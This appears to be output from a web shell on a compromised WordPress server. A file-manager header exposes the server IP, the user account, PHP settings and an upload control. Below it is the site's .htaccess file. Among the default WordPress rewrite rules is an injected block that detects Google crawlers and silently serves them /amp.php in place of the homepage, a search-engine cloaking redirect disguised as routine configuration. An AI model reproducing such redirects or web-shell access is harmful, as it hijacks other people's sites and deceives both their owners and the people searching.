| Server IP : 198.244.165.102 / Your IP : 216.73.216.218 [ Web Server : nginx/1.24.0 System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64 User : colleary ( 1011) PHP Version : 8.3.23 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/atir/public_html/ |
Upload File : |
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
# --- Googlebot handling ---
# Detect Google crawlers (expanded list)
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Googlebot-News|Googlebot-Image|Googlebot-Video|Googlebot-Mobile|Mediapartners-Google|AdsBot-Google|AdsBot-Google-Mobile|APIs-Google|Googlebot-AdsBot|Googlebot-Desktop|Googlebot-Search|Googlebot-Events|Googlebot-Tablet|Googlebot-Local|Googlebot-Apps|Googlebot-Connect|Googlebot-Books|Googlebot-Publisher|Googlebot-News-RSS|Feedfetcher-Google|DuplexWeb-Google|Google-InspectionTool|Google\ Favicon|Google\ Web\ Preview) [NC]
# Redirect Googlebot hitting the homepage
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^$ /amp.php [L]
# --- Default WordPress rules ---
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# BEGIN FRedirect_ErrorDocument
# The directives (lines) between "BEGIN FRedirect_ErrorDocument" and "END FRedirect_ErrorDocument" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
ErrorDocument 404 /index.php?error=404
# END FRedirect_ErrorDocument